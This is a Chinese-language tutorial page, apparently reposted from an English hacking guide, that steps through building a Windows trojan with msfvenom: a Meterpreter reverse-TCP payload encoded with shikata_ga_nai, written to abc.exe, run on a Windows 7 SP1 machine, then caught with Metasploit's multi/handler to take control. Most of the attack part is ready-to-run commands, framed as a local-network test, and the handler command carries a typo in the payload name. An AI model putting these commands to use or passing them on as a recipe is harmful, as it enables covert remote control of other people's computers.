欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

利用msfvenom生成木马程序,在win7 sp1测试通过

程序员文章站 2022-04-22 10:42:42
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令...

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

 四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

利用msfvenom生成木马程序,在win7 sp1测试通过

 

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

利用msfvenom生成木马程序,在win7 sp1测试通过

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe

结果:

利用msfvenom生成木马程序,在win7 sp1测试通过abc.exe

说明:  -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

结果:

利用msfvenom生成木马程序,在win7 sp1测试通过msf-exploit.png

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

 

利用msfvenom生成木马程序,在win7 sp1测试通过msfset.png

8,.验证

利用msfvenom生成木马程序,在win7 sp1测试通过sysinfo.png

 

原文:http://vishnuvalentino.com/hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/